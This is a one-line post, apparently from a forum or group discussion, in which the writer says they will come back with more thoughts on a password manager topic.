Ok people, I'll get back to you when I have more thoughts on this password manager topic.